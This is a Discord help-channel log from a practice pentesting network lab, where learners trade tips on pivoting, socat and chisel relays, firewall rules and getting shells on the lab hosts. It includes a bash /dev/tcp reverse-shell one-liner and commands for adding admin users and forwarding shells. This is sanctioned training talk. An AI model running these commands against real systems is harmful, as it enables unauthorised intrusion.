#wreath-network

1 messages · Page 14 of 1

minor dawn
#

you're only it in for x amount of days and gotta rejoin the network afterwards

round tree
#

i dont see a join button anywhere

minor dawn
#

oh, should be even more top right, haven't joined more than once tho

round tree
minor dawn
#

no idea skidy

round tree
#

fun skidy

#

over to hololive then, that one works kekw

limber rover
minor dawn
#

tried replacing with Muiri's python3 script, still getting the same error :M

#

finaggling with the script I got it to print the response from trying to add a user to repository, it seems the whole response is just "<Response [500]>"

#

modified the script to try and get it to print "r" (the variable it uses for all the http responses) in the print of the error message

#

doesn't really help...

minor dawn
#

did something happen to the network? Seems to be running with plenty of time, but my shuttle just failed, getting no route to host errors, and destination host unreachable with ping

#

oh whoops, guess it went down a sec, ip changed lulz

merry robin
minor dawn
merry robin
#

Mhm

#

Or rather, it doesn't usually matter

#

The command still gets executed

minor dawn
#

it doesn't show that error in the screenshot at least, let me see what the next step is

#

oh well, I need to see the whoami, but I can't, the program exits, if I comment out the quit command I get this

#

oh I closed my window, can't get it until I get sshuttle connected again... but I get more errors and never get the output to the whoami command

#

I'm guessing with network restart I need a new ssh key since it's a new machine?... but now the CVE python script is failing... so have to shelve the first issue for a moment lulz

#

you don't need to get a new openvpn file if the network resets do you?

minor dawn
#

needed new openvpn file, sshuttle worked, found out I misstyped in the name of calling the exploit file lulz

minor dawn
#

welp, accidentally turned off on me, started the network back up, and now no route to host again, even after getting a new ovpn file, guess I'm done for tonight

shrewd wind
#

I've noticed that the bottom of an instance of the powershell empire client shows unread messages.

#

Is there a command to read them? I can't find it in the documention on github.

hollow bane
#

Use starkiler it’s better

#

I mean they are the same but starkiller has a GUI

shrewd wind
#

"Oh no CLI"

#

That was very unhelpful.

lusty saffron
#

@manic plover Could you please check this suspicious .exe file archive? 🙂
It doesn't look good

manic plover
#

or can you DM me this person

lusty saffron
lusty saffron
manic plover
#

No worries :)

#

Thank you

earnest wolf
#

Task 5 - What OS does Nmap think is running?
Can I get some help with this one as I can't figure out what it actually wants

umbral ivy
#

You'll find your answer there

earnest wolf
#

I enumerated it but where are the headers and how to find out information using them

umbral ivy
#

You can also enumerate port 80 using -sV

earnest wolf
#

thanks bro I will try it later

latent crescent
#

hey, somehow I can't download nmap to first mashine. I create python server on my kali VM and curl from ssh sesion. It is interesting that can't ping any address from shh sesion.

#

VM kali ip I can reach from browser, host win mashine dont have any blocker (AV, firewall)

shrewd wind
latent crescent
shrewd wind
#

Oh, hmm.

#

Try running a firewall-cmd --list-all

rugged moth
#

@merry robin Finished Wreath today. Really enjoyed it, great job by all on putting that together.

dawn forge
#

Hi

#

I need reset it

strange bison
# dawn forge I need reset it

There are loads of wreath instances.
If you want a reset on your instance, people need to know what network you're on.

surreal sail
#

hru guys

dawn forge
winter lintelBOT
#

Gave +1 Rep to @strange bison

random cedar
#

I have been having a little bit of trouble to exploit the git server from my machine do I need to route the exploit through sshuttle or a proxychain in order for it to work?
IIRC the git server is on an internal IP address or can I just the run the exploit directly from my command line?

willow ferry
#

you adjust the firewall on 200?

#

I got it working with sshuttle n socat I think

random cedar
willow ferry
#

in the section that describes the exploit it notes that the firewall on the 200 box will not allow connections in so you need to add a rule for your prt fwd. Pref above 15000 as well

#

you will need socat or other fwd to then pass it back to your attack box

#

Git > webserver > you

#

webserver maybe your blocking point as its blocking the connection from the gitserver with its firewall.

random cedar
#

ahh right o, thanks for the clarification @willow ferry!

winter lintelBOT
#

Gave +1 Rep to @willow ferry

random cedar
#

still a little stuck on creating the firewall rule though

surreal sail
#

Webserver Exploitation
How can I get a reverse shell (without having the script do it for me)? I've tried nc (which isn't installed) and with bash, but both options did not work.

willow ferry
#

the command for it is in the notes for he task, just need to substitute the relevant ports you want to use. Then list the firewall rules using the commands from the link above

#

@surreal sail you should copy nc on the box somehow?

surreal sail
winter lintelBOT
#

Gave +1 Rep to @willow ferry

willow ferry
#

you can either catch the shell at the webserver or your attack box (with the relevant prt fwd of course)

surreal sail
willow ferry
#

so just a basic shell, what about native ways can you use powershell to download it?

#

from the webserver

#

why are you trying to do it without the script if you don't mind me asking?

surreal sail
willow ferry
#

ah I see, fair enough

#

well if you command execution on the websever as nt/system, the shortest path is just create the user and logon normally. its more direct but you do miss some interesting learning points

#

you could modify the orinignal gitstack script to post a base64 encoded version to a file and then use the command to decode into a binary

#

see certutil.exe for the decoding bit

surreal sail
willow ferry
#

haha! yes, sorry spoilers!

surreal sail
#

🙈

willow ferry
#

have fun anyway, I've not fully finished this one either

#

I tend to poke at bits. Got throwback next

surreal sail
#

Or is that not part of the room at all?

willow ferry
#

although there are others who maybe on the same instance as you, you should concentrate on the rooms, there is prob a set of rules somewhere about it

#

which also means you should ensure you are following nice n safe opsec for yourself.

#

i.e. secure your attack box

surreal sail
#

yeah, read about it not to mess up the system for others. I was just curious if everyone is just targeting the "room" or there is also something going on between the ones connected

willow ferry
#

it will be shared with other users.

#

hense you will come across the notes asking to setup your ports above 15000 as to no give other use false positives in ports scans etc

surreal sail
#

And sorry for bothering, you mentioned throwback, is that room similar to this one with a walkthrough?

willow ferry
#

throwback is another network like Wreath, its paid though. Full AD environment

surreal sail
#

@willow ferry hm. sounds interesting. Thanks for the assistance in the meantime.

winter lintelBOT
#

Gave +1 Rep to @willow ferry

willow ferry
#

no worries, happy learning, ask lots of silly questions, best way.

surreal sail
#

I hope this wasn't too silly :) Have a good one.

willow ferry
#

you too.

surreal sail
surreal sail
#

Tried with perl and python, too. Getting "Failed to execute command" @surreal sail

random cedar
surreal sail
surreal sail
#

:)

#

@random cedar The script is launching a shell with perl which is installed on MiniServ. I don't know why I am getting an error trying to do the same.

random cedar
#

and there is where the nc listener comes in

surreal sail
random cedar
#

this is to connect to the .200 server right?

surreal sail
random cedar
#

ahh right

#

I just simply used the exploit and it did it for me, but I haven't tried your version

surreal sail
#

I do have some issues while executing NMAP. I can scan the whole range, but a specified host does not work

lusty saffron
surreal sail
#

yes, it is the shell from the webmin exploit , was allready trying to get a stable shell 😉 Thanks!

lusty saffron
#

Yeah, it seems to be a TimeoutError as that nmap -sS .. is taking longer😅

surreal sail
#

And i jumped back into this room after several periods of being away, so i needed to check where i left off

surreal sail
#

Hello everyone, I don't know why I can't remote desktop into the windows server?

#

I have created a user and added him to the administrators group and the remote management users also however I cannot remote desktop in the server using those credentials

#

@oblique crag

surreal sail
hollow bane
lusty saffron
surreal sail
hollow bane
#

but why ping dark, there are other people who can help you

surreal sail
hollow bane
#

Ohh, I see

#

np

surreal sail
surreal sail
lusty saffron
#

!docs verify

thin crescentBOT
lusty saffron
winter lintelBOT
#

Gave +1 Rep to @lusty saffron

surreal sail
#

I think I should be able to rdp:

#

@lusty saffron

#

@hollow bane

lusty saffron
#

I do not remember the exact steps for this room
Did you add firewall rule correctly?
And set up remote port forwarding to access git-serv's RDP service

#

And what are you getting as an error while logging in for a remote desktop session?

surreal sail
#

@lusty saffron I just did this:

lusty saffron
# surreal sail

Try this evil-winrm -u user_hacker -p 'P@$$word1' -i 10.200.196.150
Single quote the password (as it contains $, the shell parses it differently)

surreal sail
lusty saffron
#

Perhaps try a simple password to test it 😄
I guess the creds aren't correct, hence the AuthorizationError

minor dawn
#

anyone run into this issue when trying to run the empire server?

Traceback (most recent call last):
  File "/usr/share/powershell-empire/empire.py", line 11, in <module>
    import empire.server.server as server
  File "/usr/share/powershell-empire/empire/server/server.py", line 24, in <module>
    import socketio
  File "/usr/lib/python3/dist-packages/socketio/__init__.py", line 3, in <module>
    from .client import Client
  File "/usr/lib/python3/dist-packages/socketio/client.py", line 7, in <module>
    import engineio
  File "/usr/lib/python3/dist-packages/engineio/__init__.py", line 8, in <module>
    from .asyncio_client import AsyncClient
  File "/usr/lib/python3/dist-packages/engineio/asyncio_client.py", line 7, in <module>
    import aiohttp
  File "/usr/lib/python3/dist-packages/aiohttp/__init__.py", line 6, in <module>
    from .client import (
  File "/usr/lib/python3/dist-packages/aiohttp/client.py", line 35, in <module>
    from . import hdrs, http, payload
  File "/usr/lib/python3/dist-packages/aiohttp/http.py", line 7, in <module>
    from .http_parser import (
  File "/usr/lib/python3/dist-packages/aiohttp/http_parser.py", line 15, in <module>
    from .helpers import NO_EXTENSIONS, BaseTimerContext
  File "/usr/lib/python3/dist-packages/aiohttp/helpers.py", line 667, in <module>
    class CeilTimeout(async_timeout.timeout):
TypeError: function() argument 'code' must be code, not str```
#

with 0 knowledge of what's going on, my first guess is something to do with python 2 vs 3? No idea tho

surreal sail
winter lintelBOT
#

Gave +1 Rep to @lusty saffron

lusty saffron
#

They both are pretty insecure 😄

willow ferry
#

@minor dawn kali issue, apt purge powershell-empire and use the instructions from the official repo

#

manual install, but works nicely

winter lintelBOT
#

Gave +1 Rep to @willow ferry

willow ferry
#

yer, I hit the same issue, fresh install of Kali too

minor dawn
willow ferry
#

possibly, just not really reliable enough to risk a update whilst testing. 😦

#

I have used the docker version too which is OK.

#

But the normal install works great

#

screw apt installing

strong charm
#

Anyone have a link to a god url encoded powershell reverse shell? I’m trying to use it for the bonus question on task 20 (git server) but none of the ones I’ve used have worked

hollow plume
hollow plume
#

1st thing i do when copy / paste some long command like that and it doesn't work. Try it out on my box, can i get the reverse shell to myself

#

and from looking at the screenshot, you appear to be either missing a ", or you have an extra "

#

the 1st quote in the command is after the perl -e ' <---single quote...but the whole command ends with '" (single followed by double quote)

#

starting the room now :)@surreal sail

surreal sail
#

Still not...

hollow plume
#

now you are missing a quote it looks like...so the other command was correct with all its quotes. Try breaking the command into multiple lines (using the ; as a line seperator) or...and this is a guess...perl is sort of like netcat in that some vesions of perl have -e functionality and some don't? or is that dumb because the exploit is using the same command and it works fine?

lusty saffron
surreal sail
lusty saffron
#

And I don't remember seeing that when I completed this room 😅

merry robin
lusty saffron
#

Was it added recently, because I can't remember seeing that in my runs?
Perhaps, to prevent users messing with tasks to some extent 🙂

merry robin
#

Nah, it's always been there

#

I haven't modified anything in that network for ages

hollow plume
#

@surreal sail think i am at the part you are. Task 6?

hollow plume
#

@surreal sail playing around with this. the perl in your SS is the shellcode from the exploit? my guess is that there is a bad char. perl -v, and perl -h both give output

#

and this bash reverse shell works from the exploit prompt (not typing shell)

#

bash -i >& /dev/tcp/10.20.30.40/1234 0>&1

#

so that perl command has a character in it that needs to be escaped or quoted or unquoted or something

surreal sail
#

@hollow plume right now, I can't connect to that server. No idea why.

hollow plume
#

time limit? i am down to 27 minutes

surreal sail
#

VPN is up. Can't ping it. Exploit doesn't run.

#

Still have time.

#

(right VPN file, not the regular)

hollow plume
#

i dont know perl well enough to keep poking at that aspect of it, but its guaranteed a bad char...hrm gonna try base64 the perl command then do echo bgajgadj32 | base64 from the exploit prompt

#

looks like it died on me as well, 22 minutes left on it

surreal sail
#

Someone's having fun.

#

I feel like when I have to deal with my neighbours :)

merry robin
#

*sigh*
Problem with letting people root it is that there will always be immature little trolls who think that shutting the server down is an amusing use of time.
Just go for a reset -- if you can figure out who the morons are I'll see about getting them removed 🙂

surreal sail
hollow plume
#

@merry robin I'm in no rush, still wrapping my head around windows AD and windows buffer overflows
Also taking my time so I can take better notes 🙂

twin flame
#

so the entry point is unreachable, i don't know if someone shut it down errr whu
do i have to wait and vote 4 more times before i can resume unless others vote as well? or can someone reset it from an admin panel or something?

lusty saffron
surreal sail
twin flame
#

194.200 is unreachable
nice

#

i see the vote

surreal sail
lusty saffron
twin flame
#

depends if you think not being able to do anything on the network is adverse

#

i guess i could go do something else for a while, just come back and vote every hour

#

@surreal sail if we vote in an hour and an hour after that, it will reset

#

¯_(ツ)_/¯

surreal sail
twin flame
#

i hope it gets logged somewhere

#

i am having oodles of fun with this network though

#

well, before this

#

lol

twin flame
#

2 more

#

anyone with a target subnet of 10.200.194.0/24, please vote for reset

#

the network went to sleep and i woke it up 🤞 hopefully it works

#

@surreal sail it's alive

┌──(tmh㉿facepalm13)-[~/Documents/thm/wreath]
└─$ ping thomaswreath.thm                                                                               
PING thomaswreath.thm (10.200.194.200) 56(84) bytes of data.
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=1 ttl=63 time=149 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=2 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=3 ttl=63 time=144 ms
c64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=4 ttl=63 time=150 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=5 ttl=63 time=147 ms
64 bytes from thomaswreath.thm (10.200.194.200): icmp_seq=6 ttl=63 time=145 ms
^C
--- thomaswreath.thm ping statistics ---
6 packets transmitted, 6 received, 0% packet loss, time 5014ms
rtt min/avg/max/mdev = 143.945/147.495/150.221/2.396 ms
#

no reset votes needed now as far as i can tell

surreal sail
winter lintelBOT
#

Gave +1 Rep to @twin flame

twin flame
#

yeah! no worries

strong charm
#

Any ideas as to why I suddenly can’t connect to the first machine in the network? The Thomaswreath url works but I can’t ssh into, ping or scan it and I was working fine an hour ago

surreal sail
#

Are you on 10.200.194.200?

strong charm
#

10.200.197.200

surreal sail
#

Succeeded once to copy/pasting the SSH key from prod_serv. Once the machine get reset I needed to fetch it again and I am getting invalid format

hollow plume
#

make sure you got the newline at the end

#

and if you are copy / paste from tmux...make sure you full panel ( if you have multiple panels open: ctrl+b, z) before copy / paste otherwise you will get a bunch of strangeness

#

i can give you the key? should be the same probably?

surreal sail
hollow plume
#

i always do to the bottom (including the blank line under)

#

the white part being what i am selecting to copy

surreal sail
#

TADA

#

Did that.

#

+rep @hollow plume

winter lintelBOT
#

Gave +1 Rep to @hollow plume

surreal sail
#

Took me half an hour trying different editors... :-/

hollow plume
#

ya different editors handle whitespace and linebreaks etc differently

#

i generally use nano when copy / pasting things like ssh keys

hollow plume
#

@surreal sail ok to add you as friend?

surreal sail
#

@hollow plume Of course. :)

hollow plume
#

🙂

solar mist
#

sshuttle -r root@10.200.192.200 10.200.192.0/24 -e "ssh -i root.webserver.priv"

#

how come I can't ping 10.200.192.150?

#
[root@prod-serv ~]# ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
64 bytes from 10.200.192.150: icmp_seq=1 ttl=128 time=1.26 ms
#
laurence@laupc ~/THM/wreath % ping 10.200.192.150
PING 10.200.192.150 (10.200.192.150) 56(84) bytes of data.
^C
--- 10.200.192.150 ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3027ms

waxen lintel
#

what are the prerequisites for this room (other than linux command line)?

merry robin
#

There's a lot to be said for reading the Introduction for rooms 🙂

solar mist
#

I finally got it!!

#

I restarted 3 times because I got stuck

#

in the past 5 months or so

#

but aye I finally did it

twin flame
#

nice!!

#

10.200.194.200 is shutdown yet again

twin flame
#

please stop extending the time on the 10.200.194.0 network, it needs to sleep so that the entry point can boot

#

🤞 hoping that works again

zenith yoke
#

Hi All, I'm a subscriber, and have no access to Wreath network, I'm in the room... no VPN servers for me... I have access to holo network... Any ideas?

#

Nevermind. I left room and join again - all works. So... 99% repairs - turn off and turn on again 🙂

midnight atlas
#

Having trouble connecting to wreath today

#

I did a small bit yesterday from my VM, had no trouble connecting or anything

#

but today even though the access page shows I'm connected the ip of the first machine is unreachable

#

and I am connected with the wreath openvpn config file

#

I'm on 10.200.199.200 btw, voted to reset but it's only 1/4 guess I'll need to try later, maybe if it sleeps it starts up again properly?

zenith yoke
#

Yes, please reset it.. server did not respond for me...

cerulean root
#

in fact, I'm confirming it is good now

midnight atlas
#

Thank you!

hearty falcon
#

Hey, why doesn't the metasploit's portfwd work?

spiral bough
#

Took me a couple of days to work through it and take detailed notes, fun little lab though!

#

Didn't follow the guide in the AV Evasion section, went for a full Powershell + C# solution. Didn't like the proposed uploading of netcat.exe solution 🤷‍♂️

merry robin
cerulean root
#

Just finished Wreath. Very well done and educational network!!

spiral bough
spiral bough
# hearty falcon Hey, why doesn't the metasploit's portfwd work?

It should work as well, though port forwarding individual ports instead of putting up a socks proxy is probably a bit too much of a hassle. Also with the network going to sleep sometimes I would suggest to just use sshuttle and a forward socks proxy with chisel, it's the easiest to work with.
You can then also use Burp in this way when you configure it to route through the chisel proxy.

north escarp
#

Hello, for task 34, i tried using chisel for pivoting and I followed the walkthrough from dark but when i try running chisel on my machine, i keep getting a connection error. I put a screenshot of my commands as well

spiral bough
#

Did you open port 19997 on the windows box? If not then the chisel client can't connect to the server

north escarp
spiral bough
#

YEs

north escarp
#

i did in the pane on top and got "Ok" as a response

#

could it be something with my internet at home? my router has been acting up lately

spiral bough
#

I would expect that your VPN connection would also crap out in that case, no?

north escarp
#

true

#

then that cant be it because all the other shells and connections were going through

spiral bough
#

You're sure that your chisel server is running on the windows box and is listening on port 19997?

north escarp
#

i mean i got the "Ok" response from running the netsh command with port 19997 as the localport

#

ill try to find how to check open ports and see if 19997 is there

spiral bough
#

netstat -ano will help

#

But you need to run the chisel server on the windows box

north escarp
#

yea ill check with it soon and i was in the screenshot as well

#

then client on our box correct?

spiral bough
#

yes, chisel server in forward proxy mode on the compromised windows box and then run the chisel client on your attack box

north escarp
#

ok thank you, ill post when i try again

vernal epoch
#

I was doing the task 6 and wondering if someone has changed the root password, because the hash i get is not being accepted and it's different than in the walkthrough video

north escarp
spiral bough
north escarp
#

ive tried adding a different port too and the same issue, it doesnt seem to open up

spiral bough
#

But you must have a process listing on that port before it shows up with netstat.
Just opening a port on the firewall doesn't show anything with netstat because there is nothing actually listing on the port you opened on the firewall

north escarp
#

ok that makes sense, ill try running chisel with the new port now

#

got it, something was wrong with my chisel

cerulean plaza
#

Just started this network but already stuck on task 6. I always get "[-] Failed to execute command" when I run the CVE....py script.

north escarp
#

For task 41, I cant seem to get a shell back, the netcat is being uploaded onto the target but i cant seem to execute the powershell command to get the shell back

gilded flame
#

hey friends, i have a problem with the connection to Wreath, is this a general problem with all of you??? because the ssh stuck every 10 sec

#

I am stuck and cant continoue the room , last 4 hours for nothing in this room

lusty saffron
#

Check pinned messages in #site-support
This is one of the suggestions to resolve network issues😄

gilded flame
#

thanks you 😂 @lusty saffron

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

north escarp
#

Finally finished! Awesome stuffed and learned a ton. Hopefully I did a good job cleaning up lol, i think i got everything. Thanks @merry robin !

winter lintelBOT
#

Gave +1 Rep to @merry robin

livid obsidian
#

Hi all, I can't connect to the network via VirtualBox and OpenVPN, however, I can confirm I'm connected to THM via 10.10.10.10

#

anyone else having problems?

livid obsidian
lusty saffron
livid obsidian
winter lintelBOT
#

Gave +1 Rep to @lusty saffron

livid obsidian
#

So I'm stuck at the reverse shell in the webserver exploitation part. I'm running the python script, turning on the listener in a different tab and then... nothing.

#

Don't want to spoil anything, so what do you need from me to be more specific?

vernal epoch
#

It took a few days to finish the room, but I learned a lot. Thanks for making this!

vernal epoch
strange bison
#

Not on the host OS?

uncut idol
#

is anyone else getting module issues with empire?

uncut idol
#

task 33 the github link is down

merry robin
rotund dock
#

@fair breach

#

The Wreath Network is down

#

10.200.125.0/24

#

Could you please reset it ??

#

There aren't enough votes for a reset

wheat creek
ancient oasis
#

Why is cherrytree still recommended in this network when according to the creator "it crashes on large file sizes and is impossible to export out of" and you should switch to trillium?

merry robin
#

It's only really when it gets to 40 or 50 odd megabytes that it starts getting unstable. For me that was about 1200 nodes. You are never gonna hit that with a pentest

ancient oasis
winter lintelBOT
#

Gave +1 Rep to @merry robin

wet dawn
#

network is down... again

#

jesussss, the network was in sleepy mode 😦

minor pivot
#

Hi. I've been trying to ssh into the machine for quite some time now but i always got (publickey,gssapi-keyex,gssapi-with-mic) error.. I also didnt find anything useful on the internet.. Then i checked previous chats in this room and saw someone that said add 2-3 new lines at the end of the file and tried that and it worked. Can anyone explain why? in my experience ssh usually fails if there are new lines at the end of the rsa file

merry robin
#

Well that's a new one. Nice one. You evaded the bot

#

But not me

#

-ban @main ermine Steam Scam -- Compromised account -ddays 4

winter lintelBOT
#

🔨 Banned maharsomi#9391 indefinitely

merry robin
#

Jesus Christ we're having fun today aren't we

#

-ban 330101054668800010 Scam... of some kind. I actually have no idea why you're advertising weight loss pills 🤷‍♂️ -ddays 2

winter lintelBOT
#

🔨 Banned Флоки*#9819 indefinitely

brittle marsh
#

hello guys

#

any help whit ssh error Permission denied (publickey,gssapi-keyex,gssapi-with-mic) ?

#

im going crazy ... tried differnt ssh conf , add empty line at the end of the key , firewall but nothing ,,,, i can access other machines via ssh but not this one

compact mason
#

the id_rsa file is empty, any way of restoring it, or must reset the server?

#

the id_rsa file on the initial server *

compact mason
#

a new one has been just generated, thank you

compact mason
#

anybody managed to fix the ssh attempt to connection error Permission denied (publickey,gssapi-keyex,gssapi-with-mic)?

#

I noticed that on the remote host the authorized_keys file permission is set to -rw-r--r-- and online I could read that the permission is supposed to be set to -rw-r--r-- . However, it's not possible to modify that file (access denied)

compact mason
#

also, the ssh connection is not allowed not even without the id_rsa file, and just trying with ssh root@x.x.x.x

#

I receive the same error

brittle marsh
#

Ah so is not solved... yesterday whit the or not it gave me the error

#

Whit The key *

compact mason
#

I can't connect at this time

brittle marsh
#

I wasn't able to connect at all via ssh

#

I don't know how to solve it

brittle marsh
#

You* o boy I woke up 5 minutes ago I can't write properly

compact mason
#

I think the issue is in the file authorized_keys. its content it's different from the id_rsa.pub and has permission of -rw-r--r--

brittle marsh
#

dunno...seems people using the thm vm can log in ...

#

and read this

#

read the mikka message on this chat ,, he solved by adding 2-3 empty line at the end of the rsa

#

but in my case do not worked

compact mason
#

fixed

#

i'm in

#

i created a new authorized_keys file called authorized_keys2 then changed the conf sshd_config file to use the authorized_keys2, restart the service and I'm in

brittle marsh
#

uh i see a new authorized_keys2

#

ahhaha

#

i try

compact mason
#

basically the authorized_key files must contain the id_rsa.pub key

#

the original file had a different .pub key. Or at least I think that was the reason, it's working now

brittle marsh
#

i love u

#

❤️

compact mason
compact mason
#

can I ask someone if what the solution I think for the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat} Is correct? I can't find the solution online (and I don't know how to cover a line under the 'spoiler' on the chat psyDuck

merry robin
#

||SPOILER TEXT GOES HERE||

rocky blaze
#

HELP TASK 5. When I run this command in web enumeration, it is super long before ending the scan. Morever, the output shows a way more open ports than it is supposed to. Someone know why? nmap 10.200.164.200 -v -p 1-15000 --open -Pn -oA /home/amandine/Desktop/Wreath/initial-scan

brittle marsh
#

ssh: connect to host 10.200.187.200 port 22: No route to host

#

only at me ? till 20min ago i can log now give me this error ...

lusty saffron
brittle marsh
#

Network state : running

brittle marsh
compact mason
merry robin
#

-undelete -a

winter lintelBOT
#

Up to 10 last deleted messages (last hour or 12 hours for premium):

2 minutes ago (Thu Jan 13 11:17:47 2022) Earwig#6490 (ID 928511483040649236): || test spoiler text ||

merry robin
compact mason
#

oh it was just a spolier text try 😄

merry robin
merry robin
compact mason
#

can I ask someone if this could be the correct solution to the question {TASK13 - Bonus Question (Optional): Try to create an encrypted port forward or relay using the OPENSSL options in socat}
||./socat OPENSSL:ATTACKING_IP:8001,cert=shell.pem,verify=0 OPENSSL:TARGET_IP:TARGET_PORT,fork,verify=0 & (quiet)|| -- quiet
.||/socat OPENSSL-LISTEN:33060,fork,reuseaddr,cert=shell.pem,verify=0 OPENSSL:172.16.0.10:3306,verify=0 & (easy)|| -- easy

brittle marsh
#

Thank u anyway

surreal sail
#

hello guys how to solve the id_rsa problem?

#

root@10.200.188.200: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

compact mason
#

try now

rocky blaze
merry robin
rocky blaze
spice cobalt
#

Hosts behind the .200 are dead :(
Except the out of scope ips

neat stag
#

I am connected to vpn of wreath but I can't ping the first machine this happened to me yesterday too but somehow it got fixed. Any ideas why does this happen? How can I fix this issue?

wet dawn
merry robin
neat stag
#

thank you

neat stag
regal wren
#

reset needed

compact mason
#

I might a little help with the task 20 - setup socat relay and run web-shell with burp. I think I have setup the relay, run netcat on the .200 server, get the reverse on my kali machine, but when I run the web-shell with burpsuit, not really sure on where I should catch the shell.

#

What I have done:

#

On the .200 server: run socat with tpc-l:23000 attackIP:45454 &
on the .200 server: run netcat 127.0.0.1 23000 -e /bin/bash --------- at same time on my kali machine run netcat -lvnp 45454, this gives me the shell (not sure if this step was actually done right, adn if I am supposed to have shell of the .200 server). Now I run the powershell exploit with burpsuit, but dont understand where I should get the shell, because nothing changes anywhere. Anyone could help?

#

the webshell is written with the ip of the .200 server and port 23000 (the one I opened on the server and setup the socat relay as listener

#

Oh, I just figured it out. sorry for the stupid question and spam. It's 2am and I should go to sleep. I was supposed to run just the socat script on the .200 server and the nc on my machine. This way my nc will catch the webshell NotLikeThis

merry robin
fair breach
#

yeah I can look to see if a machine is up/down

#

I need a subnet but pref a whole machine IP (:

oblique oar
#

should this setup work? i'm on the Reverse SOCKS Proxy: section of task 14

#

(i just read the next section and it mentioned to use socks5 proxy oops, but i just tried that too and still fails)

rocky blaze
#

Hi! I was wondering what is written in the script nc-MuirlandOracle. What does that script do exactly?

oblique oar
rocky blaze
winter lintelBOT
#

Gave +1 Rep to @oblique oar

oblique oar
#

yes just standard netcat :)

#

i say standard, but it's the version of nc with the -e flag (default on kali, but other OS's it's a slightly different version)

rocky blaze
#

Great! Thank for your help! I also have another question, where can i found a socat binary that I can transfer to the target machine? Can I just take my binary in /bin/socat then make a copy like /bin/socat-amandine, then transfer socat-amandine to my target machine?

oblique oar
#

not sure if that relies on other files so idk

#

i use the version included in the static-binaries repo

rocky blaze
oblique oar
rocky blaze
winter lintelBOT
#

Gave +1 Rep to @oblique oar

oblique oar
#

no worries

rocky blaze
#

Chisel Task 14: Does someone has already encountered this issue while unziping a file? I have tried with many unzip utilities, but it is always saying that my file is not in the right format. I have also tried redownloading it multiple time.

wet dawn
rocky blaze
#

Nan it does not work I do not know why... @wet dawn :/ I have tried with unzip too

wet dawn
rocky blaze
winter lintelBOT
#

Gave +1 Rep to @wet dawn

oblique oar
regal wren
#

are network working now?

#

can't connect

regal wren
#

can someone check network, maybe this is problem on my side?

oblique oar
#

what network? mine is fine

oblique oar
#

task 17

oblique oar
#

also, a nice little shortcut for this:

#

send it as a GET request, and then right click Change request method:

merry robin
oblique oar
#

ah rip oka

oblique oar
#

ye it's nice, changes the method, adds the headers, and swaps the get data to post data

merry robin
#

Gonna leave it as is because it'll hopefully teach people what the differences actually are, but add a note for that, I think

bright topaz
#

git-server 10.200.196.150, down??

#

cant reach it anymore, not even from webserver

brittle marsh
#

It make me feel more hackerman tipsfedora

oblique oar
#

lol have fun with that

#

i'm not making it harder for myself 😅

bright topaz
brittle marsh
brittle marsh
#

im a problem whit emipre's hop

#

the options are set ok , and it say all was uploaded on /tmp/hop/ but on .200 /tmp/ there is acutally nothing

#

[] Starting listener 'http_hop_'
[
] Hop redirector written to /tmp/http_//admin/get.php . Place this file on the redirect server.
[] Hop redirector written to /tmp/http_//news.php . Place this file on the redirect server.
[
] Hop redirector written to /tmp/http_//login/process.php . Place this file on the redirect server.

bright topaz
brittle marsh
#

Lmao

#

Ty I guess for me it's time to to sleep 😴

lone bronze
#

After 10 days, the IP adresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run script for WebMin RCE not working ...

tacit anchor
#

also if you've made it to the sshuttle part, make sure you use the new network in that command

rocky blaze
#

TASK 18 - Git Server Pivoting: Getting this error when trying to pivot with sshuttle. I have installed sshuttle. I have checked that I have ssh access to 10.200.164.200 and have verified that python is installed on 10.200.164.200 too. Any idea? 😮

rocky blaze
oblique oar
#

task 29, i'm failing to get a callback from the git server, here is my config in empire:

#

but when i run the powershell payload on the git server, it's not giving me anything back:

tacit anchor
oblique oar
#

oh ffs

#

didn't even realise there were line breaks

#

lemme try

tacit anchor
#

also make sure you've opened up 50000 on the web server's firewall, that got me stuck for a bit

oblique oar
#

ye i did that, that got me in an earlier task aha

#

looks like the command is giving an error or something?

#

nvm encoding it worked

oblique oar
winter lintelBOT
#

Gave +1 Rep to @tacit anchor

oblique oar
#

what's this doe with empire

tacit anchor
#

try using "shell hostname", I'm not sure if hostname works on its own, I would need to check the help

oblique oar
#

ohhh didn't realise i had to prefix commands with shell in starkiller too

tacit anchor
#

some commands you don't (like whoami), you can check the help menu in the agent to see what it supports

tacit anchor
#

oops I didn't realize you were using starkiller, I didn't use it so I have no idea how commands differ there.

lone bronze
winter lintelBOT
#

Gave +1 Rep to @tacit anchor

oblique oar
#

wreath was so amazing thank you so much muir !! i learnt loads from this network and is definitely my favourite "room" on thm so far. all the content was formatted beautifully, in a logical manner staying clear and concise, and was really useful knowledge <3

hollow bane
#

Hey jake, May I DM?

oblique oar
#

sure

lone bronze
#

After 10 days, the IP adresses changed from 10.200.194.x to 10.200.191.x ( 100,150, 200). I can't do anything, run nmap for first machine ( host down), script for WebMin RCE not working ...

#

What I should do?

tacit anchor
merry robin
#

Answers remain and each subnet is identical, however

rigid aspen
#

any pros and cons on sshuttle method?

tacit anchor
merry robin
#
  • needs python on the target
rustic siren
#

Hi. Can someone help with sshuttle?

#

I can't get it to work for scanning internal network

#

I use following command to set it up:
||sudo sshuttle -r root@10.200.195.20 --ssh-cmd "ssh -i id_rsa" 10.200.195.0/24||

#

it says "connected to server", but seems like it does not really work. Scanning network with nmap gives same results as without sshuttle

#

what am I missing here?

rustic siren
#

Yup

tacit anchor
#

I would also exclude the web server so you can still connect to it, with the -x switch

#

but otherwise it looks OK, assuming your lab is using 10.200.195.0/24

rustic siren
#

Sorry that was a typo on discord. In the command i use it is 200

#

I tried excluding but that did not solve neither

tacit anchor
rustic siren
#

Sure it works, but i wanted to test sshuttle

lone bronze
winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

-undelete -a

winter lintelBOT
#

Up to 10 last deleted messages (last hour or 12 hours for premium):

